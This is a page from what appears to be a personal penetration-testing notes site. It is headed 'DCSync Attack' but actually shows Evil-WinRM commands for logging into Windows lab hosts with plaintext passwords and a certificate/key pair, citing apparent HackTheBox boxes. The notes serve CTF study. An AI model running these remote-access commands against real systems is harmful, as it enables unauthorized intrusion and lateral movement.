DCSync Attack

06/02/2023

shuciran

Basic Access

Evil-WinRM to access via port tcp-5985 into a system:

  
evil-winrm -i 10.10.11.158 -u 'nikk37' -p 'get_dem_girls2@yahoo.com'

Examples: [[Forest#^b22389]]

Active Directory Certificate Services

#Note We can extract the .cer and the .key from a .pfx as per the [[Legacy PFX certificate]] guide. If we get a .cer certificate from the /certsrv endpoint on the DC website we can access to it as follows, for more info go to [[WinRM Certificate (password-less) based authentication]]:

  
evil-winrm -S -c certnew.cer -k amanda.key -i 10.10.10.103 -u 'amanda' -p 'Ashare1972'

Examples: Sizzle

12 Active Directory, Lateral Movement

Reverse Shells
Finding GUID with ipainstaller
Plist Files
Signing IPA with Sideloadly (Non-jailbroken)
Signing IPA with TrollStore (Non-jailbroken)

exploitation wireless file transfer hackthebox active directory scr windows privesc mobile linux enumeration linux privesc

DCSync Attack

Basic Access

Active Directory Certificate Services

SYSVOL (Groups.xml)

DCSync Attack

Silver Ticket Attack